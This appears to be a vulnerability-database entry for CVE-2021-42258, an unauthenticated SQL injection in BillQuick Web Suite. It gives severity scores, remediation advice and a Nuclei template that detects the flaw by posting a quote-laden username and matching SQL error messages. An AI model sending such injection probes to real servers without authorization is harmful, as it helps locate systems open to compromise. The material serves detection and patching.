BillQuick Web Suite SQL Injection

2021-10-2608:26:22

ProjectDiscovery

github.com

cve2021

sqli

billquick

kev

bqe

unauthenticated

remote code execution

security patches

compromise

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.973

Percentile

99.9%

JSON

BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.

id: CVE-2021-42258

info:
  name: BillQuick Web Suite SQL Injection
  author: dwisiswant0
  severity: critical
  description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite.
  reference:
    - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42258
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Ostorlab/KEV
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-42258
    cwe-id: CWE-89
    epss-score: 0.9738
    epss-percentile: 0.99901
    cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: bqe
    product: billquick_web_suite
  tags: cve2021,cve,sqli,billquick,kev,bqe

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96

    matchers:
      - type: word
        part: body
        words:
          - "System.Data.SqlClient.SqlException"
          - "Incorrect syntax near"
          - "_ACCOUNTLOCKED"
        condition: and

    extractors:
      - type: xpath
        name: VS
        internal: true
        xpath:
          - "/html/body/form/div/input[@id='__VIEWSTATE']"
        attribute: value

      - type: xpath
        name: VSG
        internal: true
        xpath:
          - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
        attribute: value

      - type: xpath
        name: EV
        internal: true
        xpath:
          - "/html/body/form/div/input[@id='__EVENTVALIDATION']"
        attribute: value
# digest: 4b0a0048304602210096ac7613d8118a6e83fc200da64d198cab9837d8532d76dd435f8f6d394e1a81022100e38483a2a89a277b9d4f33ff80fb59c13e81b4610752b1e7fe0a74f6de84cc99:922c64590222798bb761d5b6d8e72950